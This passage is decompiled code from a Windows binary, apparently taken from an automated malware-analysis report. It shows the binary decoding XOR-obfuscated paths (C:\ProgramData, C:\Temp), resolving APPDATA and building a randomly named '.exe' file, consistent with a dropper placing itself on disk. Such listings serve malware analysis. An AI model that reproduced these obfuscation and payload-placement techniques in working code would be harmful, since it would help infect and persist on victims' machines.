								if(_t867 - _t1421 + 0xfffffffc > 0x1f) {
									goto L32;
								} else {
									goto L29;
								}
							}
						}
					} else {
						_t1645 =  *((intOrPtr*)(_t1407 + 8));
						_t1803 =  &(1[_t1655]);
						_t1384 = _t1645;
						if(_t1803 < 0x1000) {
							L25:
							_push(_t1803);
							E0040ED7F(_t1645);
							_t1837 = _t1837 + 8;
							goto L26;
						} else {
							_t50 = _t1645 - 4; // 0xffffe6c2
							_t1421 =  *_t50;
							_t1657 =  &(_t1803[0x23]);
							if(_t1384 - _t1421 + 0xfffffffc > 0x1f) {
								L32:
								E004134A7(_t1407, _t1657, __eflags);
								asm("int3");
								asm("int3");
								_push(_t1407);
								_t1409 = _t1837;
								_t1844 = (_t1837 - 0x00000008 & 0xfffffff8) + 4;
								_push(_t1825);
								_v128 =  *((intOrPtr*)(_t1409 + 4));
								_t1828 = _t1844;
								_push(0xffffffff);
								_push(0x42c8c2);
								_push( *[fs:0x0]);
								_push(_t1409);
								_t1845 = _t1844 - 0x1c0;
								_t873 =  *0x43d054; // 0x8e1b5714
								_t874 = _t873 ^ _t1828;
								_v152 = _t874;
								_push(_t1812);
								_push(_t1807);
								_push(_t874);
								 *[fs:0x0] =  &_v144;
								_t1815 = _t1421;
								_v520 = _t1815;
								_v520 = _t1815;
								_v516 = 0;
								_v500 = 0;
								_v496 = 0xf;
								_v516 = 0;
								_v136 = 0;
								_t876 = E004065E0(_t1815); // executed
								__eflags = _t876;
								if(_t876 != 0) {
									E00406760(_t1409,  &_v360, _t1807);
									_v28 = 0x16;
									_t878 = E00417D76( &_v360, __eflags);
									asm("cdq");
									E004055C0( &_v384, _t878 % 0xa + 5);
									_v28 = 0x17;
									_v413 = 0x2e;
									_t1808 =  *( *[fs:0x2c]);
									_t882 =  *0x450f1c; // 0x0
									__eflags = _t882 -  *((intOrPtr*)(_t1808 + 4));
									if(_t882 >  *((intOrPtr*)(_t1808 + 4))) {
										E0040EEC8(_t882, 0x450f1c);
										_t1845 = _t1845 + 4;
										__eflags =  *0x450f1c - 0xffffffff;
										if(__eflags == 0) {
											asm("movaps xmm0, [0x439d70]");
											asm("movups [0x450e3c], xmm0");
											 *0x450e4c = _v413;
											E0040F1DA( &_v384, __eflags, 0x42cf90);
											E0040EE7E(0x450f1c);
											_t1845 = _t1845 + 8;
										}
									}
									_t883 =  *0x450e4c; // 0x0
									__eflags = _t883;
									if(_t883 != 0) {
										asm("movups xmm0, [0x450e3c]");
										asm("movaps xmm1, [0x439d20]");
										asm("pxor xmm1, xmm0");
										 *0x450e4c = _t883 ^ 0x0000002e;
										asm("movups [0x450e3c], xmm1");
									}
									_t1425 = 0x450e3c;
									_v464 = 0;
									_v448 = 0;
									_v444 = 0xf;
									_v464 = 0;
									_t466 = _t1425 + 1; // 0x450e3d
									_t1660 = _t466;
									do {
										_t884 =  *_t1425;
										_t1425 = _t1425 + 1;
										__eflags = _t884;
									} while (_t884 != 0);
									E004026C0(_t1409,  &_v464, 0x450e3c, _t1425 - _t1660);
									_v28 = 0x18;
									_t1661 = _v444;
									_t1428 = _v448;
									__eflags = _t1661 - _t1428 - 1;
									if(_t1661 - _t1428 < 1) {
										_v412 = 0;
										_t888 = E00402990(_t1409,  &_v464, _t1808, _t1815, 1, _v412, "\\", 1);
									} else {
										_t471 = _t1428 + 1; // 0x1
										__eflags = _t1661 - 0x10;
										_v448 = _t471;
										_t1147 =  >=  ? _v464 :  &_v464;
										 *((short*)(( >=  ? _v464 :  &_v464) + _t1428)) = 0x5c;
										_t888 =  &_v464;
									}
									_v440 = 0;
									_v424 = 0;
									_v420 = 0;
									asm("movups xmm0, [eax]");
									asm("movups [ebp-0x1a0], xmm0");
									asm("movq xmm0, [eax+0x10]");
									asm("movq [ebp-0x190], xmm0");
									 *(_t888 + 0x10) = 0;
									 *(_t888 + 0x14) = 0xf;
									 *_t888 = 0;
									_v28 = 0x19;
									_t890 = E0040C910( &_v488,  &_v440,  &_v360);
									_t1846 = _t1845 + 4;
									E004024A0(_t1409,  &_v408, _t890);
									_t1663 = _v468;
									__eflags = _t1663 - 0x10;
									if(_t1663 < 0x10) {
										L231:
										_v28 = 0x18;
										_t1664 = _v420;
										_v472 = 0;
										_v468 = 0xf;
										_v488 = 0;
										__eflags = _t1664 - 0x10;
										if(_t1664 < 0x10) {
											L235:
											_v28 = 0x17;
											_t1665 = _v444;
											_v424 = 0;
											_v420 = 0xf;
											_v440 = 0;
											__eflags = _t1665 - 0x10;
											if(_t1665 < 0x10) {
												L239:
												_t1847 = _t1846 - 0x18;
												_v316 = _t1847;
												E0040BB10(_t1409, _t1847, _t1665, _t1808,  &_v384);
												_t1848 = _t1847 - 0x18;
												_v28 = 0x1a;
												_t1433 = _t1848;
												E0040BB10(_t1409, _t1433, _t1665, _t1808,  &_v408);
												_v28 = 0x17;
												_t896 = E00406800(_t1409, _t1433, _t1808, _t1815);
												_t1849 = _t1848 + 0x30;
												__eflags = _t896;
												if(_t896 == 0) {
													_t897 =  *0x450f68; // 0x0
													_v328 = 0x7e72146d;
													_v324 = 0x5c49415c;
													_v320 = 0x4f6a434f;
													_v316 = 0x4f5a;
													_v413 = 0x2e;
													__eflags = _t897 -  *((intOrPtr*)(_t1808 + 4));
													if(_t897 >  *((intOrPtr*)(_t1808 + 4))) {
														E0040EEC8(_t897, 0x450f68);
														_t1849 = _t1849 + 4;
														__eflags =  *0x450f68 - 0xffffffff;
														if(__eflags == 0) {
															asm("movq xmm0, [ebp-0x130]");
															 *0x450d50 = _v320;
															 *0x450d54 = _v316;
															asm("movq [0x450d48], xmm0");
															 *0x450d56 = _v413;
															E0040F1DA(_t1433, __eflags, 0x42cf60);
															E0040EE7E(0x450f68);
															_t1849 = _t1849 + 8;
														}
													}
													__eflags =  *0x450d56;
													if( *0x450d56 != 0) {
														_t1103 = 0;
														__eflags = 0;
														do {
															 *(_t1103 + 0x450d48) =  *(_t1103 + 0x450d48) ^ 0x0000002e;
															_t1103 = _t1103 + 1;
															__eflags = _t1103 - 0xf;
														} while (_t1103 < 0xf);
													}
													_t1434 = 0x450d48;
													_v464 = 0;
													_v448 = 0;
													_v444 = 0xf;
													_v464 = 0;
													_t570 = _t1434 + 1; // 0x450d49
													_t1666 = _t570;
													asm("o16 nop [eax+eax]");
													do {
														_t898 =  *_t1434;
														_t1434 = _t1434 + 1;
														__eflags = _t898;
													} while (_t898 != 0);
													E004026C0(_t1409,  &_v464, 0x450d48, _t1434 - _t1666);
													_v28 = 0x1d;
													_t1667 = _v444;
													_t1437 = _v448;
													__eflags = _t1667 - _t1437 - 1;
													if(_t1667 - _t1437 < 1) {
														_v412 = 0;
														_t902 = E00402990(_t1409,  &_v464, _t1808, _t1815, 1, _v412, "\\", 1);
													} else {
														_t575 = _t1437 + 1; // 0x1
														__eflags = _t1667 - 0x10;
														_v448 = _t575;
														_t1102 =  >=  ? _v464 :  &_v464;
														 *((short*)(( >=  ? _v464 :  &_v464) + _t1437)) = 0x5c;
														_t902 =  &_v464;
													}
													_v440 = 0;
													_v424 = 0;
													_v420 = 0;
													asm("movups xmm0, [eax]");
													asm("movups [ebp-0x1a0], xmm0");
													asm("movq xmm0, [eax+0x10]");
													asm("movq [ebp-0x190], xmm0");
													 *(_t902 + 0x10) = 0;
													 *(_t902 + 0x14) = 0xf;
													 *_t902 = 0;
													_v28 = 0x1e;
													_t904 = E0040C910( &_v488,  &_v440,  &_v360);
													_t1850 = _t1849 + 4;
													E004024A0(_t1409,  &_v408, _t904);
													_t1669 = _v468;
													__eflags = _t1669 - 0x10;
													if(_t1669 < 0x10) {
														L277:
														_v28 = 0x1d;
														_t1670 = _v420;
														_v472 = 0;
														_v468 = 0xf;
														_v488 = 0;
														__eflags = _t1670 - 0x10;
														if(_t1670 < 0x10) {
															L281:
															_v28 = 0x17;
															_t1671 = _v444;
															_v424 = 0;
															_v420 = 0xf;
															_v440 = 0;
															__eflags = _t1671 - 0x10;
															if(_t1671 < 0x10) {
																L285:
																_t1851 = _t1850 - 0x18;
																_v316 = _t1851;
																E0040BB10(_t1409, _t1851, _t1671, _t1808,  &_v384);
																_t1852 = _t1851 - 0x18;
																_v28 = 0x1f;
																_t1442 = _t1852;
																E0040BB10(_t1409, _t1442, _t1671, _t1808,  &_v408);
																_v28 = 0x17;
																_t910 = E00406800(_t1409, _t1442, _t1808, _t1815);
																_t1853 = _t1852 + 0x30;
																__eflags = _t910;
																if(_t910 == 0) {
																	_t911 =  *0x450d74; // 0x0
																	_v320 = 0x7a72146d;
																	_v316 = 0x2e5e434b;
																	__eflags = _t911 -  *((intOrPtr*)(_t1808 + 4));
																	if(_t911 >  *((intOrPtr*)(_t1808 + 4))) {
																		E0040EEC8(_t911, 0x450d74);
																		_t1853 = _t1853 + 4;
																		__eflags =  *0x450d74 - 0xffffffff;
																		if(__eflags == 0) {
																			 *0x450d58 = _v320;
																			 *0x450d5c = _v316;
																			E0040F1DA(_v316, __eflags, 0x42cf50);
																			E0040EE7E(0x450d74);
																			_t1853 = _t1853 + 8;
																		}
																	}
																	_t912 =  *0x450d5f; // 0x0
																	__eflags = _t912;
																	if(_t912 != 0) {
																		 *0x450d58 =  *0x450d58 ^ 0x0000002e;
																		 *0x450d59 =  *0x450d59 ^ 0x0000002e;
																		 *0x450d5a =  *0x450d5a ^ 0x0000002e;
																		 *0x450d5b =  *0x450d5b ^ 0x0000002e;
																		 *0x450d5c =  *0x450d5c ^ 0x0000002e;
																		 *0x450d5d =  *0x450d5d ^ 0x0000002e;
																		 *0x450d5e =  *0x450d5e ^ 0x0000002e;
																		_t1056 = _t912 ^ 0x0000002e;
																		__eflags = _t1056;
																		 *0x450d5f = _t1056;
																	}
																	_t1443 = 0x450d58;
																	_v464 = 0;
																	_v448 = 0;
																	_v444 = 0xf;
																	_v464 = 0;
																	_t668 =  &(_t1443[1]); // 0x450d59
																	_t1672 = _t668;
																	do {
																		_t913 =  *_t1443;
																		_t1443 =  &(_t1443[1]);
																		__eflags = _t913;
																	} while (_t913 != 0);
																	E004026C0(_t1409,  &_v464, 0x450d58, _t1443 - _t1672);
																	_v28 = 0x22;
																	_t1673 = _v444;
																	_t1446 = _v448;
																	__eflags = _t1673 - _t1446 - 1;
																	if(_t1673 - _t1446 < 1) {
																		_v412 = 0;
																		_t917 = E00402990(_t1409,  &_v464, _t1808, _t1815, 1, _v412, "\\", 1);
																	} else {
																		_t673 = _t1446 + 1; // 0x1
																		__eflags = _t1673 - 0x10;
																		_v448 = _t673;
																		_t1055 =  >=  ? _v464 :  &_v464;
																		 *((short*)(( >=  ? _v464 :  &_v464) + _t1446)) = 0x5c;
																		_t917 =  &_v464;
																	}
																	_v440 = 0;
																	_v424 = 0;
																	_v420 = 0;
																	asm("movups xmm0, [eax]");
																	asm("movups [ebp-0x1a0], xmm0");
																	asm("movq xmm0, [eax+0x10]");
																	asm("movq [ebp-0x190], xmm0");
																	 *(_t917 + 0x10) = 0;
																	 *(_t917 + 0x14) = 0xf;
																	 *_t917 = 0;
																	_v28 = 0x23;
																	_t919 = E0040C910( &_v488,  &_v440,  &_v360);
																	_t1854 = _t1853 + 4;
																	E004024A0(_t1409,  &_v408, _t919);
																	_t1675 = _v468;
																	__eflags = _t1675 - 0x10;
																	if(_t1675 < 0x10) {
																		L322:
																		_v28 = 0x22;
																		_t1676 = _v420;
																		_v472 = 0;
																		_v468 = 0xf;
																		_v488 = 0;
																		__eflags = _t1676 - 0x10;
																		if(_t1676 < 0x10) {
																			L326:
																			_v28 = 0x17;
																			_t1677 = _v444;
																			_v424 = 0;
																			_v420 = 0xf;
																			_v440 = 0;
																			__eflags = _t1677 - 0x10;
																			if(_t1677 < 0x10) {
																				L330:
																				_t1855 = _t1854 - 0x18;
																				_v316 = _t1855;
																				E0040BB10(_t1409, _t1855, _t1677, _t1808,  &_v384);
																				_t1856 = _t1855 - 0x18;
																				_v28 = 0x24;
																				_t1451 = _t1856;
																				E0040BB10(_t1409, _t1451, _t1677, _t1808,  &_v408);
																				_v28 = 0x17;
																				_t925 = E00406800(_t1409, _t1451, _t1808, _t1815);
																				_t1857 = _t1856 + 0x30;
																				__eflags = _t925;
																				if(_t925 == 0) {
																					E00402450(_t1409,  &_v384);
																					_v28 = 0;
																					E00402450(_t1409,  &_v360);
																					goto L342;
																				} else {
																					_push(_t1451);
																					_t932 = E0040C6F0( &_v440,  &_v408);
																					_v28 = 0x25;
																					_t933 = E0040C910( &_v488, _t932,  &_v384);
																					_t1854 = _t1857 + 8;
																					_t1463 = _t933;
																					_v28 = 0x26;
																					_t1808 =  *(_t1463 + 0x14);
																					_t1680 =  *(_t1463 + 0x10);
																					__eflags = _t1808 - _t1680 - 4;
																					if(_t1808 - _t1680 < 4) {
																						_v412 = 0;
																						_t1463 = E00402990(_t1409, _t1463, _t1808, _t1815, 4, _v412, ".exe", 4);
																					} else {
																						 *(_t1463 + 0x10) =  &(_t1680->lpSecurityDescriptor);
																						_t1040 = _t1463;
																						__eflags = _t1808 - 0x10;
																						if(_t1808 >= 0x10) {
																							_t1040 =  *_t1463;
																						}
																						 *((intOrPtr*)(_t1040 + _t1680)) = 0x6578652e;
																						 *((char*)(_t1040 +  &(_t1680->lpSecurityDescriptor))) = 0;
																					}
																					 *_t1815 = 0;
																					 *(_t1815 + 0x10) = 0;
																					 *(_t1815 + 0x14) = 0;
																					asm("movups xmm0, [ecx]");
																					asm("movups [esi], xmm0");
																					asm("movq xmm0, [ecx+0x10]");
																					asm("movq [esi+0x10], xmm0");
																					 *(_t1463 + 0x10) = 0;
																					 *(_t1463 + 0x14) = 0xf;
																					 *_t1463 = 0;
																					_t1677 = _v468;
																					__eflags = _t1677 - 0x10;
																					if(_t1677 < 0x10) {
																						L340:
																						_v472 = 0;
																						_v468 = 0xf;
																						_v488 = 0;
																						E00402450(_t1409,  &_v440);
																						E00402450(_t1409,  &_v384);
																						E00402450(_t1409,  &_v360);
																						goto L343;
																					} else {
																						_t1467 = _v488;
																						_t1677 =  &(1[_t1677]);
																						_t940 = _t1467;
																						__eflags = _t1677 - 0x1000;
																						if(_t1677 < 0x1000) {
																							L339:
																							_push(_t1677);
																							E0040ED7F(_t1467);
																							goto L340;
																						} else {
																							_t1467 =  *((intOrPtr*)(_t1467 - 4));
																							_t1677 = _t1677 + 0x23;
																							__eflags = _t940 - _t1467 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L346;
																							} else {
																								goto L339;
																							}
																						}
																					}
																				}
																			} else {
																				_t1534 = _v464;
																				_t1677 =  &(1[_t1677]);
																				_t1041 = _t1534;
																				__eflags = _t1677 - 0x1000;
																				if(_t1677 < 0x1000) {
																					L329:
																					_push(_t1677);
																					E0040ED7F(_t1534);
																					_t1854 = _t1854 + 8;
																					goto L330;
																				} else {
																					_t1467 =  *((intOrPtr*)(_t1534 - 4));
																					_t1677 = _t1677 + 0x23;
																					__eflags = _t1041 -  *((intOrPtr*)(_t1534 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L346;
																					} else {
																						goto L329;
																					}
																				}
																			}
																		} else {
																			_t1535 = _v440;
																			_t1699 =  &(_t1676->nLength);
																			_t1045 = _t1535;
																			__eflags = _t1699 - 0x1000;
																			if(_t1699 < 0x1000) {
																				L325:
																				_push(_t1699);
																				E0040ED7F(_t1535);
																				_t1854 = _t1854 + 8;
																				goto L326;
																			} else {
																				_t1467 =  *((intOrPtr*)(_t1535 - 4));
																				_t1677 = _t1699 + 0x23;
																				__eflags = _t1045 -  *((intOrPtr*)(_t1535 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L346;
																				} else {
																					goto L325;
																				}
																			}
																		}
																	} else {
																		_t1536 = _v488;
																		_t1700 = _t1675 + 1;
																		_t1049 = _t1536;
																		__eflags = _t1700 - 0x1000;
																		if(_t1700 < 0x1000) {
																			L321:
																			_push(_t1700);
																			E0040ED7F(_t1536);
																			_t1854 = _t1854 + 8;
																			goto L322;
																		} else {
																			_t1467 =  *((intOrPtr*)(_t1536 - 4));
																			_t1677 = _t1700 + 0x23;
																			__eflags = _t1049 -  *((intOrPtr*)(_t1536 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L346;
																			} else {
																				goto L321;
																			}
																		}
																	}
																} else {
																	_push(_t1442);
																	_t1061 = E0040C6F0( &_v440,  &_v408);
																	_v28 = 0x20;
																	_t1062 = E0040C910( &_v488, _t1061,  &_v384);
																	_t1854 = _t1853 + 8;
																	_t1541 = _t1062;
																	_v28 = 0x21;
																	_t1808 =  *(_t1541 + 0x14);
																	_t1703 =  *(_t1541 + 0x10);
																	__eflags = _t1808 - _t1703 - 4;
																	if(_t1808 - _t1703 < 4) {
																		_v412 = 0;
																		_t1541 = E00402990(_t1409, _t1541, _t1808, _t1815, 4, _v412, ".exe", 4);
																	} else {
																		 *(_t1541 + 0x10) =  &(_t1703->lpSecurityDescriptor);
																		_t1087 = _t1541;
																		__eflags = _t1808 - 0x10;
																		if(_t1808 >= 0x10) {
																			_t1087 =  *_t1541;
																		}
																		 *((intOrPtr*)(_t1087 + _t1703)) = 0x6578652e;
																		 *((char*)(_t1087 +  &(_t1703->lpSecurityDescriptor))) = 0;
																	}
																	 *_t1815 = 0;
																	 *(_t1815 + 0x10) = 0;
																	 *(_t1815 + 0x14) = 0;
																	asm("movups xmm0, [ecx]");
																	asm("movups [esi], xmm0");
																	asm("movq xmm0, [ecx+0x10]");
																	asm("movq [esi+0x10], xmm0");
																	 *(_t1541 + 0x10) = 0;
																	 *(_t1541 + 0x14) = 0xf;
																	 *_t1541 = 0;
																	_t1704 = _v468;
																	__eflags = _t1704 - 0x10;
																	if(_t1704 < 0x10) {
																		L295:
																		_t1705 = _v420;
																		_v472 = 0;
																		_v468 = 0xf;
																		_v488 = 0;
																		__eflags = _t1705 - 0x10;
																		if(_t1705 < 0x10) {
																			L299:
																			_t1706 = _v364;
																			_v424 = 0;
																			_v420 = 0xf;
																			_v440 = 0;
																			__eflags = _t1706 - 0x10;
																			if(_t1706 < 0x10) {
																				L303:
																				_t1707 = _v340;
																				_v368 = 0;
																				_v364 = 0xf;
																				_v384 = 0;
																				__eflags = _t1707 - 0x10;
																				if(_t1707 < 0x10) {
																					goto L261;
																				} else {
																					_t1543 = _v360;
																					_t1708 = _t1707 + 1;
																					_t1070 = _t1543;
																					__eflags = _t1708 - 0x1000;
																					if(_t1708 < 0x1000) {
																						L306:
																						_push(_t1708);
																						E0040ED7F(_t1543);
																						_t1854 = _t1854 + 8;
																						_v344 = 0;
																						_v340 = 0xf;
																						_v360 = 0;
																						goto L72;
																					} else {
																						_t1467 =  *((intOrPtr*)(_t1543 - 4));
																						_t1677 = _t1708 + 0x23;
																						__eflags = _t1070 -  *((intOrPtr*)(_t1543 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L346;
																						} else {
																							goto L306;
																						}
																					}
																				}
																			} else {
																				_t1544 = _v384;
																				_t1709 = _t1706 + 1;
																				_t1074 = _t1544;
																				__eflags = _t1709 - 0x1000;
																				if(_t1709 < 0x1000) {
																					L302:
																					_push(_t1709);
																					E0040ED7F(_t1544);
																					_t1854 = _t1854 + 8;
																					goto L303;
																				} else {
																					_t1467 =  *((intOrPtr*)(_t1544 - 4));
																					_t1677 = _t1709 + 0x23;
																					__eflags = _t1074 -  *((intOrPtr*)(_t1544 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L346;
																					} else {
																						goto L302;
																					}
																				}
																			}
																		} else {
																			_t1545 = _v440;
																			_t1710 =  &(_t1705->nLength);
																			_t1078 = _t1545;
																			__eflags = _t1710 - 0x1000;
																			if(_t1710 < 0x1000) {
																				L298:
																				_push(_t1710);
																				E0040ED7F(_t1545);
																				_t1854 = _t1854 + 8;
																				goto L299;
																			} else {
																				_t1467 =  *((intOrPtr*)(_t1545 - 4));
																				_t1677 = _t1710 + 0x23;
																				__eflags = _t1078 -  *((intOrPtr*)(_t1545 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L346;
																				} else {
																					goto L298;
																				}
																			}
																		}
																	} else {
																		_t1546 = _v488;
																		_t1711 = _t1704 + 1;
																		_t1082 = _t1546;
																		__eflags = _t1711 - 0x1000;
																		if(_t1711 < 0x1000) {
																			L294:
																			_push(_t1711);
																			E0040ED7F(_t1546);
																			_t1854 = _t1854 + 8;
																			goto L295;
																		} else {
																			_t1467 =  *((intOrPtr*)(_t1546 - 4));
																			_t1677 = _t1711 + 0x23;
																			__eflags = _t1082 -  *((intOrPtr*)(_t1546 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L346;
																			} else {
																				goto L294;
																			}
																		}
																	}
																}
															} else {
																_t1547 = _v464;
																_t1671 =  &(_t1671->nLength);
																_t1088 = _t1547;
																__eflags = _t1671 - 0x1000;
																if(_t1671 < 0x1000) {
																	L284:
																	_push(_t1671);
																	E0040ED7F(_t1547);
																	_t1850 = _t1850 + 8;
																	goto L285;
																} else {
																	_t1467 =  *((intOrPtr*)(_t1547 - 4));
																	_t1677 = _t1671 + 0x23;
																	__eflags = _t1088 -  *((intOrPtr*)(_t1547 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L346;
																	} else {
																		goto L284;
																	}
																}
															}
														} else {
															_t1548 = _v440;
															_t1712 =  &(_t1670->nLength);
															_t1092 = _t1548;
															__eflags = _t1712 - 0x1000;
															if(_t1712 < 0x1000) {
																L280:
																_push(_t1712);
																E0040ED7F(_t1548);
																_t1850 = _t1850 + 8;
																goto L281;
															} else {
																_t1467 =  *((intOrPtr*)(_t1548 - 4));
																_t1677 = _t1712 + 0x23;
																__eflags = _t1092 -  *((intOrPtr*)(_t1548 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L346;
																} else {
																	goto L280;
																}
															}
														}
													} else {
														_t1549 = _v488;
														_t1713 = _t1669 + 1;
														_t1096 = _t1549;
														__eflags = _t1713 - 0x1000;
														if(_t1713 < 0x1000) {
															L276:
															_push(_t1713);
															E0040ED7F(_t1549);
															_t1850 = _t1850 + 8;
															goto L277;
														} else {
															_t1467 =  *((intOrPtr*)(_t1549 - 4));
															_t1677 = _t1713 + 0x23;
															__eflags = _t1096 -  *((intOrPtr*)(_t1549 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L346;
															} else {
																goto L276;
															}
														}
													}
												} else {
													_push(_t1433);
													_t1110 = E0040C6F0( &_v440,  &_v408);
													_v28 = 0x1b;
													_t1111 = E0040C910( &_v488, _t1110,  &_v384);
													_t1854 = _t1849 + 8;
													_t1553 = _t1111;
													_v28 = 0x1c;
													_t1808 =  *(_t1553 + 0x14);
													_t1716 =  *(_t1553 + 0x10);
													__eflags = _t1808 - _t1716 - 4;
													if(_t1808 - _t1716 < 4) {
														_v412 = 0;
														_t1553 = E00402990(_t1409, _t1553, _t1808, _t1815, 4, _v412, ".exe", 4);
													} else {
														 *(_t1553 + 0x10) =  &(_t1716->lpSecurityDescriptor);
														_t1132 = _t1553;
														__eflags = _t1808 - 0x10;
														if(_t1808 >= 0x10) {
															_t1132 =  *_t1553;
														}
														 *((intOrPtr*)(_t1132 + _t1716)) = 0x6578652e;
														 *((char*)(_t1132 +  &(_t1716->lpSecurityDescriptor))) = 0;
													}
													 *_t1815 = 0;
													 *(_t1815 + 0x10) = 0;
													 *(_t1815 + 0x14) = 0;
													asm("movups xmm0, [ecx]");
													asm("movups [esi], xmm0");
													asm("movq xmm0, [ecx+0x10]");
													asm("movq [esi+0x10], xmm0");
													 *(_t1553 + 0x10) = 0;
													 *(_t1553 + 0x14) = 0xf;
													 *_t1553 = 0;
													_t1717 = _v468;
													__eflags = _t1717 - 0x10;
													if(_t1717 < 0x10) {
														L249:
														_t1718 = _v420;
														_v472 = 0;
														_v468 = 0xf;
														_v488 = 0;
														__eflags = _t1718 - 0x10;
														if(_t1718 < 0x10) {
															L253:
															_t1719 = _v364;
															_v424 = 0;
															_v420 = 0xf;
															_v440 = 0;
															__eflags = _t1719 - 0x10;
															if(_t1719 < 0x10) {
																L257:
																_t1720 = _v340;
																_v368 = 0;
																_v364 = 0xf;
																_v384 = 0;
																__eflags = _t1720 - 0x10;
																if(_t1720 < 0x10) {
																	L261:
																	_v344 = 0;
																	_v340 = 0xf;
																	_v360 = 0;
																	goto L72;
																} else {
																	_t1554 = _v360;
																	_t1721 = _t1720 + 1;
																	_t1115 = _t1554;
																	__eflags = _t1721 - 0x1000;
																	if(_t1721 < 0x1000) {
																		L260:
																		_push(_t1721);
																		E0040ED7F(_t1554);
																		_t1854 = _t1854 + 8;
																		goto L261;
																	} else {
																		_t1467 =  *((intOrPtr*)(_t1554 - 4));
																		_t1677 = _t1721 + 0x23;
																		__eflags = _t1115 -  *((intOrPtr*)(_t1554 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L346;
																		} else {
																			goto L260;
																		}
																	}
																}
															} else {
																_t1555 = _v384;
																_t1722 = _t1719 + 1;
																_t1119 = _t1555;
																__eflags = _t1722 - 0x1000;
																if(_t1722 < 0x1000) {
																	L256:
																	_push(_t1722);
																	E0040ED7F(_t1555);
																	_t1854 = _t1854 + 8;
																	goto L257;
																} else {
																	_t1467 =  *((intOrPtr*)(_t1555 - 4));
																	_t1677 = _t1722 + 0x23;
																	__eflags = _t1119 -  *((intOrPtr*)(_t1555 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L346;
																	} else {
																		goto L256;
																	}
																}
															}
														} else {
															_t1556 = _v440;
															_t1723 =  &(_t1718->nLength);
															_t1123 = _t1556;
															__eflags = _t1723 - 0x1000;
															if(_t1723 < 0x1000) {
																L252:
																_push(_t1723);
																E0040ED7F(_t1556);
																_t1854 = _t1854 + 8;
																goto L253;
															} else {
																_t1467 =  *((intOrPtr*)(_t1556 - 4));
																_t1677 = _t1723 + 0x23;
																__eflags = _t1123 -  *((intOrPtr*)(_t1556 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L346;
																} else {
																	goto L252;
																}
															}
														}
													} else {
														_t1557 = _v488;
														_t1724 = _t1717 + 1;
														_t1127 = _t1557;
														__eflags = _t1724 - 0x1000;
														if(_t1724 < 0x1000) {
															L248:
															_push(_t1724);
															E0040ED7F(_t1557);
															_t1854 = _t1854 + 8;
															goto L249;
														} else {
															_t1467 =  *((intOrPtr*)(_t1557 - 4));
															_t1677 = _t1724 + 0x23;
															__eflags = _t1127 -  *((intOrPtr*)(_t1557 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L346;
															} else {
																goto L248;
															}
														}
													}
												}
											} else {
												_t1558 = _v464;
												_t1665 =  &(_t1665->nLength);
												_t1133 = _t1558;
												__eflags = _t1665 - 0x1000;
												if(_t1665 < 0x1000) {
													L238:
													_push(_t1665);
													E0040ED7F(_t1558);
													_t1846 = _t1846 + 8;
													goto L239;
												} else {
													_t1467 =  *((intOrPtr*)(_t1558 - 4));
													_t1677 = _t1665 + 0x23;
													__eflags = _t1133 -  *((intOrPtr*)(_t1558 - 4)) + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L346;
													} else {
														goto L238;
													}
												}
											}
										} else {
											_t1559 = _v440;
											_t1725 =  &(_t1664->nLength);
											_t1137 = _t1559;
											__eflags = _t1725 - 0x1000;
											if(_t1725 < 0x1000) {
												L234:
												_push(_t1725);
												E0040ED7F(_t1559);
												_t1846 = _t1846 + 8;
												goto L235;
											} else {
												_t1467 =  *((intOrPtr*)(_t1559 - 4));
												_t1677 = _t1725 + 0x23;
												__eflags = _t1137 -  *((intOrPtr*)(_t1559 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L346;
												} else {
													goto L234;
												}
											}
										}
									} else {
										_t1560 = _v488;
										_t1726 = _t1663 + 1;
										_t1141 = _t1560;
										__eflags = _t1726 - 0x1000;
										if(_t1726 < 0x1000) {
											L230:
											_push(_t1726);
											E0040ED7F(_t1560);
											_t1846 = _t1846 + 8;
											goto L231;
										} else {
											_t1467 =  *((intOrPtr*)(_t1560 - 4));
											_t1677 = _t1726 + 0x23;
											__eflags = _t1141 -  *((intOrPtr*)(_t1560 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L346;
											} else {
												goto L230;
											}
										}
									}
								} else {
									_t1153 =  &_v312;
									__imp__SHGetFolderPathA(0, 0x1a, 0, 0, _t1153); // executed
									__eflags = _t1153;
									if(__eflags < 0) {
										_t1727 = E00418AE5(_t1409, _t1807, _t1815, __eflags, "APPDATA");
										_t1845 = _t1845 + 4;
										_t1561 = _t1727;
										_t74 = _t1561 + 1; // 0x1
										_t1808 = _t74;
										do {
											_t1155 =  *_t1561;
											_t1561 = _t1561 + 1;
											__eflags = _t1155;
										} while (_t1155 != 0);
										_t1562 = _t1561 - _t1808;
										__eflags = _t1562;
										_push(_t1562);
										_push(_t1727);
									} else {
										_t1643 =  &_v312;
										_t1802 = _t1643 + 1;
										asm("o16 nop [eax+eax]");
										goto L36;
										L36:
										_t1382 =  *_t1643;
										_t1643 = _t1643 + 1;
										__eflags = _t1382;
										if(_t1382 != 0) {
											goto L36;
										} else {
											_push(_t1643 - _t1802);
											_push( &_v312);
										}
									}
									E004026C0(_t1409,  &_v408);
									E00406760(_t1409,  &_v384, _t1808); // executed
									_v28 = 1;
									_t1158 = E00417D76( &_v384, __eflags);
									asm("cdq");
									_t1566 =  &_v360;
									E004055C0(_t1566, _t1158 % 0xa + 5);
									_push(_t1566);
									_v28 = 2;
									_t1161 = E0040C6F0( &_v488,  &_v408);
